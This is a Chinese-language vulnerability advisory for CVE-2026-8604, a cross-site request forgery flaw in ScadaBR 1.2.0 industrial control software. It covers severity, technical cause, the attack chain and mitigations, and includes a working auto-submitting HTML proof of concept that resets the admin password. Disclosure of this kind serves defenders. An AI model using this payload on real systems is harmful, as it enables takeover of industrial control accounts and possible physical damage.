CVE-2026-8604 CVSS 8.8 高危

CVE-2026-8604 ScadaBR跨站请求伪造漏洞

披露日期: 2026-05-19

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-8604

漏洞类型

CSRF (跨站请求伪造)

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

ScadaBR

漏洞概述

ScadaBR 1.2.0版本存在严重的跨站请求伪造（CSRF）安全漏洞。该漏洞源于应用程序未能对关键操作提供充分的请求验证机制。远程攻击者可利用此漏洞，通过诱导已登录的管理员或用户访问特制的恶意网页，劫持其合法会话。成功利用后，攻击者无需获取用户凭证即可执行任意授权操作，严重威胁系统的机密性、完整性和可用性。

技术细节

ScadaBR 1.2.0在处理用户请求时，未实施有效的CSRF防御机制，如同步令牌模式或严格的Referer/Origin头检查。CSRF漏洞的核心在于服务器仅依赖浏览器自动发送的Cookie来验证用户身份，而无法区分请求是由用户主动发起还是由第三方站点诱导发起。攻击者可以构造包含恶意HTML表单或JavaScript代码的网页，当已登录ScadaBR的用户访问该页面时，浏览器会在后台自动携带用户的Session Cookie向ScadaBR服务器发送关键操作请求（如修改密码、添加设备等）。由于服务器缺乏对请求上下文的验证，导致恶意请求被执行。考虑到ScadaBR常用于工业控制系统，一旦被利用，可能导致物理设备的非预期操作，后果极其严重。

攻击链分析

STEP 1

攻击者侦察并确认目标系统正在使用ScadaBR 1.2.0版本。

STEP 2

攻击者构造一个包含恶意HTTP请求的HTML页面（CSRF载荷），该请求针对ScadaBR的敏感功能接口。

STEP 3

攻击者通过钓鱼邮件或社会工程学手段，诱导已登录ScadaBR的管理员用户点击访问该恶意链接。

STEP 4

受害者在浏览器中访问页面时，浏览器自动携带用户的Session Cookie向ScadaBR服务器发送恶意请求。

STEP 5

ScadaBR服务器验证Cookie有效，误认为是用户主动操作，执行攻击者预设的指令。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<html> <body> <script>history.pushState('', '', '/')</script>  <form action="http://<target-ip>/scadabr/edit_user_save.htm" method="POST"> <input type="hidden" name="username" value="admin" /> <input type="hidden" name="password" value="attacker123" /> <input type="hidden" name="email" value="[email protected]" /> <input type="submit" value="Submit request" /> </form> <script> // Auto-submit the form to trigger the action without user interaction document.forms[0].submit(); </script> </body> </html>

影响范围

ScadaBR 1.2.0

防御指南

临时缓解措施

建议用户在未修复漏洞前，避免在浏览外部网页时同时保持ScadaBR管理后台的登录状态，并在完成操作后立即注销。管理员应通过网络访问控制列表（ACL）限制管理界面的访问来源，仅允许受信任的内网IP或管理终端访问。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表